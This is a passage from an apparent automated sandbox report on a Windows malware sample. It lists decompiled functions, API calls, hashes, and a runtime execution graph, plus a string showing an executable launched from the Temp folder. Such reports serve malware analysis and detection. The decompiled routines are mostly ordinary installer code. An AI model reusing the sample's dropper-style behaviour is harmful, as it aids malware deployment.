                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: MessageSend$Timeout
                                    • String ID: !
                                    • API String ID: 1777923405-2657877971
                                    • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                    • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                    • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                    • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                    0x00406544
                                    0x00406546
                                    0x0040655b
                                    0x0040655e
                                    0x00406563
                                    0x00406568
                                    0x004065a6
                                    0x004065a6
                                    0x0040656a
                                    0x0040657c
                                    0x00406587
                                    0x0040658d
                                    0x00406598
                                    0x00000000
                                    0x00000000
                                    0x00406598
                                    0x004065ac

                                    APIs
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230), ref: 0040657C
                                    • RegCloseKey.ADVAPI32(?), ref: 00406587
                                    Strings
                                    • "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx, xrefs: 0040653D
                                    • ('B, xrefs: 0040655B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue
                                    • String ID: "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx$('B
                                    • API String ID: 3356406503-2060357249
                                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                    • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                    • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                    0x00405f38
                                    0x00405f45
                                    0x00405f46
                                    0x00405f51
                                    0x00405f59
                                    0x00405f59
                                    0x00405f61

                                    APIs
                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                    • CharPrevW.USER32(?,00000000), ref: 00405F47
                                    • lstrcatW.KERNEL32 ref: 00405F59
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CharPrevlstrcatlstrlen
                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 2659869361-4017390910
                                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                    • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                    • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                    0x00405642
                                    0x0040564c
                                    0x00405668
                                    0x0040568a
                                    0x0040568d
                                    0x00405693
                                    0x0040569d
                                    0x0040569e
                                    0x004056a0
                                    0x004056a6
                                    0x004056a6
                                    0x004056b0
                                    0x00000000
                                    0x004056be
                                    0x00405675
                                    0x004056ad
                                    0x004056ad
                                    0x00000000
                                    0x004056ad
                                    0x00405681
                                    0x00405683
                                    0x00000000
                                    0x00405683
                                    0x00405652
                                    0x00000000
                                    0x00000000
                                    0x00405659
                                    0x00000000

                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 0040566D
                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                      • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Window$CallMessageProcSendVisible
                                    • String ID:
                                    • API String ID: 3748168415-3916222277
                                    • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                    • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                    • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                    • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                    0x004060cd
                                    0x004060cf
                                    0x004060d2
                                    0x004060fe
                                    0x004060d7
                                    0x004060e0
                                    0x004060e5
                                    0x004060f0
                                    0x004060f3
                                    0x0040610f
                                    0x004060f5
                                    0x004060fc
                                    0x00000000
                                    0x004060fc
                                    0x00406108
                                    0x0040610c
                                    0x0040610c
                                    0x00406106
                                    0x00000000

                                    APIs
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                    • CharNextA.USER32(00000000), ref: 004060F6
                                    • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: lstrlen$CharNextlstrcmpi
                                    • String ID:
                                    • API String ID: 190613189-0
                                    • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                    • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                    • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                    • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:9.5%
                                    Dynamic/Decrypted Code Coverage:5.7%
                                    Signature Coverage:5.3%
                                    Total number of Nodes:1879
                                    Total number of Limit Nodes:27
                                    execution_graph 14743 40b344 14744 40b350 _signal 14743->14744 14745 40b361 14744->14745 14746 40b385 _wcslen 14744->14746 14747 402686 _signal 67 API calls 14745->14747 14750 4059e4 __lock 67 API calls 14746->14750 14748 40b366 14747->14748 14749 402673 _signal 67 API calls 14748->14749 14751 40b36d 14749->14751 14752 40b397 14750->14752 14753 4025f0 _signal 6 API calls 14751->14753 14754 40b3c1 14752->14754 14758 40b27f 14752->14758 14757 40b37d _signal 14753->14757 14771 40b3da 14754->14771 14759 40b2eb GetConsoleOutputCP WideCharToMultiByte 14758->14759 14760 40b29c 14758->14760 14762 40b312 WriteConsoleA 14759->14762 14766 40b2b4 14759->14766 14761 40b2aa 14760->14761 14774 412a85 CreateFileA 14760->14774 14764 40b2bb WriteConsoleW 14761->14764 14761->14766 14762->14766 14765 40b2d1 14764->14765 14764->14766 14765->14766 14768 40b2da GetLastError 14765->14768 14767 4057a2 ___convertcp 5 API calls 14766->14767 14769 40b336 14767->14769 14768->14766 14770 40b2e5 14768->14770 14769->14752 14770->14759 14775 4058f2 LeaveCriticalSection 14771->14775 14773 40b3e1 14773->14757 14774->14761 14775->14773 13122 414254 13123 414260 _signal 13122->13123 13124 4059e4 __lock 67 API calls 13123->13124 13125 414267 13124->13125 13126 41427b 13125->13126 13128 4142b1 13125->13128 13127 402673 _signal 67 API calls 13126->13127 13129 414280 13127->13129 13131 413f39 __getenv_helper_nolock 122 API calls 13128->13131 13130 4025f0 _signal 6 API calls 13129->13130 13144 41428f 13130->13144 13132 4142b9 _strlen 13131->13132 13135 414d14 _calloc 67 API calls 13132->13135 13132->13144 13134 414328 _signal 13136 4142d2 13135->13136 13137 4142f2 13136->13137 13138 4142db 13136->13138 13139 407e9b _strcpy_s 67 API calls 13137->13139 13140 402673 _signal 67 API calls 13138->13140 13141 4142fc 13139->13141 13142 4142e0 13140->13142 13141->13144 13145 402489 __invoke_watson 10 API calls 13141->13145 13143 402673 _signal 67 API calls 13142->13143 13143->13144 13146 414331 13144->13146 13145->13144 13149 4058f2 LeaveCriticalSection 13146->13149 13148 414338 13148->13134 13149->13148 13198 40745a 13199 407466 _signal 13198->13199 13200 40754c 13199->13200 13205 4074b1 13199->13205 13238 407501 _siglookup 13199->13238 13201 4059e4 __lock 67 API calls 13200->13201 13203 407553 13201->13203 13202 407517 _signal 13207 40757e 13203->13207 13208 40756a SetConsoleCtrlHandler 13203->13208 13204 402673 _signal 67 API calls 13206 407679 13204->13206 13215 4044ab __getptd_noexit 67 API calls 13205->13215 13205->13238 13211 4025f0 _signal 6 API calls 13206->13211 13209 4075a5 13207->13209 13210 407617 13207->13210 13208->13207 13212 407586 13208->13212 13214 4075b4 13209->13214 13218 4075f7 13209->13218 13219 4075af 13209->13219 13216 40429b __decode_pointer 6 API calls 13210->13216 13211->13202 13213 402686 _signal 67 API calls 13212->13213 13217 40758b GetLastError 13213->13217 13220 40429b __decode_pointer 6 API calls 13214->13220 13226 4075d0 13214->13226 13221 4074c9 13215->13221 13222 407622 13216->13222 13217->13207 13223 40429b __decode_pointer 6 API calls 13218->13223 13219->13214 13224 4075d7 13219->13224 13225 4075c2 13220->13225 13233 404c68 __malloc_crt 67 API calls 13221->13233 13221->13238 13222->13226 13229 404220 __encode_pointer 7 API calls 13222->13229 13228 407602 13223->13228 13230 40429b __decode_pointer 6 API calls 13224->13230 13225->13226 13232 404220 __encode_pointer 7 API calls 13225->13232 13239 407652 13226->13239 13228->13226 13234 404220 __encode_pointer 7 API calls 13228->13234 13229->13226 13231 4075e2 13230->13231 13231->13226 13236 404220 __encode_pointer 7 API calls 13231->13236 13232->13226 13235 4074e8 13233->13235 13234->13226 13237 405290 _signal __VEC_memcpy 13235->13237 13235->13238 13236->13226 13237->13238 13238->13202 13238->13204 13242 4058f2 LeaveCriticalSection 13239->13242 13241 407659 13241->13238 13242->13241 14883 40995f 14886 4058f2 LeaveCriticalSection 14883->14886 14885 409966 14886->14885 14896 407369 14897 407375 _signal 14896->14897 14898 4059e4 __lock 67 API calls 14897->14898 14899 40737d 14898->14899 14900 4073a2 14899->14900 14901 407386 14899->14901 14903 40429b __decode_pointer 6 API calls 14900->14903 14902 40429b __decode_pointer 6 API calls 14901->14902 14904 407396 14902->14904 14903->14904 14906 404292 ___crtMessageBoxW 7 API calls 14904->14906 14907 4073cb 14904->14907 14906->14907 14909 4073e4 14907->14909 14908 4073d9 _signal 14912 4058f2 LeaveCriticalSection 14909->14912 14911 4073ea 14911->14908 14912->14911 14963 41417c 14964 414188 _signal 14963->14964 14965 4059e4 __lock 67 API calls 14964->14965 14969 41418f 14965->14969 14966 4141a3 14967 402673 _signal 67 API calls 14966->14967 14968 4141a8 14967->14968 14970 4025f0 _signal 6 API calls 14968->14970 14969->14966 14971 4141e1 14969->14971 14979 4141b7 14970->14979 14973 413f39 __getenv_helper_nolock 122 API calls 14971->14973 14975 4141ef _strlen 14973->14975 14974 414242 _signal 14976 407e9b _strcpy_s 67 API calls 14975->14976 14975->14979 14977 41421f 14976->14977 14978 402489 __invoke_watson 10 API calls 14977->14978 14977->14979 14978->14979 14980 41424b 14979->14980 14983 4058f2 LeaveCriticalSection 14980->14983 14982 414252 14982->14974 14983->14982 13761 402813 13768 4030fc 13761->13768 13764 402826 13766 404a01 ___wtomb_environ 67 API calls 13764->13766 13767 402831 13766->13767 13781 402fcf 13768->13781 13770 402818 13770->13764 13771 4057b1 13770->13771 13772 4057bd _signal 13771->13772 13773 4059e4 __lock 67 API calls 13772->13773 13774 4057c9 13773->13774 13775 405832 13774->13775 13778 405807 DeleteCriticalSection 13774->13778 13798 40b203 13774->13798 13811 405847 13775->13811 13779 404a01 ___wtomb_environ 67 API calls 13778->13779 13779->13774 13780 40583e _signal 13780->13764 13782 402fdb _signal 13781->13782 13783 4059e4 __lock 67 API calls 13782->13783 13789 402fea 13783->13789 13784 403082 13794 4030a0 13784->13794 13786 402874 __getstream 68 API calls 13786->13789 13787 40308e _signal 13787->13770 13789->13784 13789->13786 13790 402f87 105 API calls __fflush_nolock 13789->13790 13791 403071 13789->13791 13790->13789 13792 4028e2 __getstream 2 API calls 13791->13792 13793 40307f 13792->13793 13793->13789 13797 4058f2 LeaveCriticalSection 13794->13797 13796 4030a7 13796->13787 13797->13796 13799 40b20f _signal 13798->13799 13800 40b240 13799->13800 13801 40b223 13799->13801 13803 402833 __lock_file 68 API calls 13800->13803 13810 40b238 _signal 13800->13810 13802 402673 _signal 67 API calls 13801->13802 13804 40b228 13802->13804 13805 40b258 13803->13805 13806 4025f0 _signal 6 API calls 13804->13806 13814 40b18c 13805->13814 13806->13810 13810->13774 13864 4058f2 LeaveCriticalSection 13811->13864 13813 40584e 13813->13780 13815 40b1a0 13814->13815 13816 40b1bc 13814->13816 13817 402673 _signal 67 API calls 13815->13817 13818 40b1b5 13816->13818 13819 402f1f __flush 101 API calls 13816->13819 13820 40b1a5 13817->13820 13830 40b277 13818->13830 13821 40b1c8 13819->13821 13822 4025f0 _signal 6 API calls 13820->13822 13833 412a35 13821->13833 13822->13818 13825 402351 __fileno 67 API calls 13826 40b1d6 13825->13826 13837 40bc36 13826->13837 13828 40b1dc 13828->13818 13829 404a01 ___wtomb_environ 67 API calls 13828->13829 13829->13818 13831 4028a6 _fseek 2 API calls 13830->13831 13832 40b27d 13831->13832 13832->13810 13834 40b1d0 13833->13834 13835 412a45 13833->13835 13834->13825 13835->13834 13836 404a01 ___wtomb_environ 67 API calls 13835->13836 13836->13834 13838 40bc42 _signal 13837->13838 13839 40bc65 13838->13839 13840 40bc4a 13838->13840 13842 40bc73 13839->13842 13845 40bcb4 13839->13845 13841 402686 _signal 67 API calls 13840->13841 13843 40bc4f 13841->13843 13844 402686 _signal 67 API calls 13842->13844 13846 402673 _signal 67 API calls 13843->13846 13847 40bc78 13844->13847 13848 404f17 ___lock_fhandle 68 API calls 13845->13848 13849 40bc57 _signal 13846->13849 13850 402673 _signal 67 API calls 13847->13850 13851 40bcba 13848->13851 13849->13828 13852 40bc7f 13850->13852 13853 40bcd5 13851->13853 13854 40bcc7 13851->13854 13855 4025f0 _signal 6 API calls 13852->13855 13857 402673 _signal 67 API calls 13853->13857 13856 40bb9a __close_nolock 70 API calls 13854->13856 13855->13849 13858 40bccf 13856->13858 13857->13858 13860 40bcf9 13858->13860 13863 404fb7 LeaveCriticalSection 13860->13863 13862 40bd01 13862->13849 13863->13862 13864->13813 15096 409125 15097 409131 _signal 15096->15097 15098 40915b 15097->15098 15099 40913c 15097->15099 15101 404524 __getptd 67 API calls 15098->15101 15100 402673 _signal 67 API calls 15099->15100 15102 409141 15100->15102 15103 409160 15101->15103 15104 4025f0 _signal 6 API calls 15102->15104 15105 4082cd _setlocale 75 API calls 15103->15105 15109 409151 _signal _setlocale 15104->15109 15106 40916a 15105->15106 15107 404cad __calloc_crt 67 API calls 15106->15107 15108 40917d 15107->15108 15108->15109 15110 4059e4 __lock 67 API calls 15108->15110 15111 409193 15110->15111 15112 408269 __copytlocinfo_nolock 8 API calls 15111->15112 15113 4091a5 15112->15113 15134 409253 15113->15134 15116 408e0a __setlocale_nolock 119 API calls 15117 4091ba 15116->15117 15118 4091c6 __setlocale_nolock 15117->15118 15119 40926a 15117->15119 15121 4059e4 __lock 67 API calls 15118->15121 15120 4081d0 ___removelocaleref 8 API calls 15119->15120 15122 409270 15120->15122 15124 4091ef 15121->15124 15123 407ff8 ___freetlocinfo 67 API calls 15122->15123 15123->15109 15125 40828f _setlocale 75 API calls 15124->15125 15126 409201 15125->15126 15127 4081d0 ___removelocaleref 8 API calls 15126->15127 15128 409207 15127->15128 15129 409238 _sync_legacy_variables_lk 15128->15129 15131 40828f _setlocale 75 API calls 15128->15131 15137 40925f 15129->15137 15132 409223 15131->15132 15133 405290 _signal __VEC_memcpy 15132->15133 15133->15129 15140 4058f2 LeaveCriticalSection 15134->15140 15136 4091ad 15136->15116 15141 4058f2 LeaveCriticalSection 15137->15141 15139 409266 15139->15109 15140->15136 15141->15139 14200 4084c2 14201 408400 _signal 14200->14201 14202 4059e4 __lock 67 API calls 14201->14202 14203 4084a3 _signal 14201->14203 14204 40841e 14202->14204 14205 408445 14204->14205 14206 40842a InterlockedDecrement 14204->14206 14220 4084ad 14205->14220 14206->14205 14207 408435 14206->14207 14207->14205 14210 404a01 ___wtomb_environ 67 API calls 14207->14210 14210->14205 14211 408493 14212 404a01 ___wtomb_environ 67 API calls 14211->14212 14212->14203 14213 4059e4 __lock 67 API calls 14214 40845e 14213->14214 14215 4081d0 ___removelocaleref 8 API calls 14214->14215 14218 40846d 14215->14218 14216 408486 14223 4084b9 14216->14223 14218->14216 14219 407ff8 ___freetlocinfo 67 API calls 14218->14219 14219->14216 14226 4058f2 LeaveCriticalSection 14220->14226 14222 408452 14222->14211 14222->14213 14227 4058f2 LeaveCriticalSection 14223->14227 14225 4084c0 14225->14211 14226->14222 14227->14225 14238 4084cd 14239 4084d9 _signal 14238->14239 14240 404524 __getptd 67 API calls 14239->14240 14241 4084de 14240->14241 14242 404cad __calloc_crt 67 API calls 14241->14242 14243 4084e9 14242->14243 14244 408503 14243->14244 14245 4084f4 14243->14245 14247 4082cd _setlocale 75 API calls 14244->14247 14246 402673 _signal 67 API calls 14245->14246 14251 4084f9 _signal 14246->14251 14248 408508 14247->14248 14249 4094bb _LocaleUpdate::_LocaleUpdate 69 API calls 14248->14249 14250 40850d 14249->14250 14252 4059e4 __lock 67 API calls 14250->14252 14253 40851f 14252->14253 14254 408141 ___addlocaleref 8 API calls 14253->14254 14255 40852b 14254->14255 14261 408567 14255->14261 14258 4059e4 __lock 67 API calls 14259 40853f InterlockedIncrement 14258->14259 14264 408573 14259->14264 14267 4058f2 LeaveCriticalSection 14261->14267 14263 408538 14263->14258 14268 4058f2 LeaveCriticalSection 14264->14268 14266 40857a 14266->14251 14267->14263 14268->14266 14282 40ead9 14285 40e8f6 14282->14285 14286 406dc0 _LocaleUpdate::_LocaleUpdate 77 API calls 14285->14286 14287 40e915 14286->14287 14288 40e947 14287->14288 14289 40e91c 14287->14289 14290 40e94f 14288->14290 14306 40e97a 14288->14306 14291 402673 _signal 67 API calls 14289->14291 14292 402673 _signal 67 API calls 14290->14292 14294 40e921 14291->14294 14295 40e954 14292->14295 14293 40ea6f 14296 402673 _signal 67 API calls 14293->14296 14297 4025f0 _signal 6 API calls 14294->14297 14298 4025f0 _signal 6 API calls 14295->14298 14299 40ea74 14296->14299 14303 40e931 14297->14303 14298->14303 14301 4025f0 _signal 6 API calls 14299->14301 14300 40ea25 14300->14293 14302 40ea54 14300->14302 14300->14303 14301->14303 14304 402673 _signal 67 API calls 14302->14304 14304->14303 14305 40b55a __isleadbyte_l 77 API calls 14305->14306 14306->14293 14306->14300 14306->14305 14308 40e0ad 14306->14308 14309 40e283 14308->14309 14310 40e0c6 14308->14310 14314 40e3c5 14309->14314 14317 40e3d9 14309->14317 14319 40e29b 14309->14319 14323 40e0d5 14309->14323 14311 40e0cc 14310->14311 14325 40e251 14310->14325 14311->14323 14327 40e1bc 14311->14327 14312 40e119 _expandtime 